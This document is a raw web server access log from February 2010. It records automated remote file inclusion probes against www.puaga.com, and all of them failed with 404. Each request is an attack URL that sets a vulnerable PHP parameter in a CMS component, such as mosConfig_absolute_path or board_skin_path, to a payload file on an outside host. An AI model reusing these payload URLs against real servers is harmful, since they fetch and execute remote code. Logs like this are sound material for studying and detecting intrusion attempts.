80.172.236.41 - - [20/Feb/2010:06:01:42 -0800] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:01:42 -0800] "GET /logs/access_100202.log%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:01:48 -0800] "GET /logs/access_100206.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:01:52 -0800] "GET /logs/access_100202.log%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:01:52 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:01:52 -0800] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.5.10 - - [20/Feb/2010:06:01:59 -0800] "GET /logs/access_100203.log//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
70.86.5.10 - - [20/Feb/2010:06:01:59 -0800] "GET /components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
70.86.5.10 - - [20/Feb/2010:06:01:59 -0800] "GET /logs//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
70.86.5.10 - - [20/Feb/2010:06:02:04 -0800] "GET /logs/access_100208.log//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:02:08 -0800] "GET /logs/access_100206.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:02:28 -0800] "GET /logs/access_100111.log//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:02:32 -0800] "GET /logs/access_100122.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:06:03:04 -0800] "GET /components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:06:03:04 -0800] "GET /logs//components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:06:03:04 -0800] "GET /logs/access_100125.log//components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:03:27 -0800] "GET /logs/access_100206.log%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:03:32 -0800] "GET /logs/access_100206.log%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:06:03:50 -0800] "GET /logs/access_100119.log%20%20//bbs/write.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:03:52 -0800] "GET /toolbar.php?dirDepth=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:03:52 -0800] "GET /logs/access_100129.log%20%20//toolbar.php?dirDepth=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:03:52 -0800] "GET /logs//toolbar.php?dirDepth=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:03:53 -0800] "GET /logs/access_100121.log%20%20//toolbar.php?dirDepth=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:04:38 -0800] "GET /logs/access_100210.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:06:05:17 -0800] "GET /logs/access_100111.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:06:05:20 -0800] "GET /logs/access_100129.log//components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:05:33 -0800] "GET /logs/access_100120.log%20%20//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:05:33 -0800] "GET /appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:05:33 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:05:33 -0800] "GET /logs/access_100124.log%20%20//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:05:39 -0800] "GET /logs/access_100119.log%20%20//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [20/Feb/2010:06:05:50 -0800] "GET /bbs/delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:05:55 -0800] "GET /logs/access_100122.log//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:06:06:04 -0800] "GET /logs/access_100125.log/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:06:06:04 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:06:06:05 -0800] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:06:06:09 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:06:06:09 -0800] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:06:06:09 -0800] "GET /logs/access_100125.log%20%20/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:06:19 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:06:19 -0800] "GET /appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:06:19 -0800] "GET /logs/access_100120.log%20%20//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:06:22 -0800] "GET /logs/access_100124.log%20%20//appserv/main.php?appserv_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:06:06:23 -0800] "GET /logs/access_100128.log//bbs/write_comment_update.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:06:30 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:06:30 -0800] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:06:30 -0800] "GET /logs/access_100201.log%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:06:37 -0800] "GET /toolbar.php?dirDepth=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:06:37 -0800] "GET /logs/access_100129.log%20%20//toolbar.php?dirDepth=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:06:38 -0800] "GET /logs//toolbar.php?dirDepth=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:06:06:38 -0800] "GET /logs/access_100214.log//bbs/write_comment_update.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:06:38 -0800] "GET /logs/access_100121.log%20%20//toolbar.php?dirDepth=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:06:07:08 -0800] "GET /logs/access_100114.log%20%20/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:07:17 -0800] "GET /logs/access_100129.log%20%20//EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:07:17 -0800] "GET /EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:07:17 -0800] "GET /logs//EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:07:19 -0800] "GET /EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:07:19 -0800] "GET /logs/access_100129.log%20%20//EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:07:19 -0800] "GET /logs//EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:07:21 -0800] "GET /logs/access_100124.log%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:07:21 -0800] "GET /logs/access_100129.log//EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:07:21 -0800] "GET /EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:07:21 -0800] "GET /logs//EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:07:22 -0800] "GET /logs/access_100129.log//EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:07:22 -0800] "GET /logs//EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:07:22 -0800] "GET /EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [20/Feb/2010:06:07:36 -0800] "GET /write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [20/Feb/2010:06:07:36 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [20/Feb/2010:06:07:36 -0800] "GET /logs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [20/Feb/2010:06:07:45 -0800] "GET /logs/access_100125.log%20%20//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:06:07:51 -0800] "GET /logs/access_100114.log/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [20/Feb/2010:06:07:54 -0800] "GET /logs//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [20/Feb/2010:06:07:54 -0800] "GET /logs/access_100203.log//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [20/Feb/2010:06:07:54 -0800] "GET /components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:08:02 -0800] "GET /logs//modify.php?dir_module=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:08:02 -0800] "GET /modify.php?dir_module=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:08:02 -0800] "GET /logs/access_100207.log%20%20//modify.php?dir_module=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:08:02 -0800] "GET /logs//modify.php?dir_module=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [20/Feb/2010:06:08:06 -0800] "GET /logs/access_100208.log//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:08:12 -0800] "GET /logs/access_100207.log%20%20//modify.php?dir_module=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:08:12 -0800] "GET /modify.php?dir_module=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:09:16 -0800] "GET /EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:09:16 -0800] "GET /logs/access_100129.log//EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:09:16 -0800] "GET /logs//EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:09:19 -0800] "GET /logs/access_100129.log//EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:09:19 -0800] "GET /logs//EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:09:19 -0800] "GET /EXIF_Makernote.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:09:20 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:09:20 -0800] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:09:20 -0800] "GET /logs/access_100205.log%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:09:23 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:09:23 -0800] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:09:23 -0800] "GET /logs/access_100205.log/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:09:27 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:09:27 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:06:09:27 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:09:59 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:06:10:03 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:06:10:03 -0800] "GET /logs/access_100213.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:06:10:03 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:10:09 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:10:09 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:10:09 -0800] "GET /logs/access_100117.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:10:31 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:10:31 -0800] "GET /logs/access_100117.log//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [20/Feb/2010:06:10:31 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:10:42 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:10:42 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:06:10:42 -0800] "GET /logs/access_100207.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:10:52 -0800] "GET /logs/access_100204.log%20%20//modify.php?dir_module=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:10:52 -0800] "GET /logs/access_100204.log%20%20//modify.php?dir_module=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [20/Feb/2010:06:11:09 -0800] "GET /logs/access_100117.log//skin/happycast_category_lightblack/login.php?dir=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
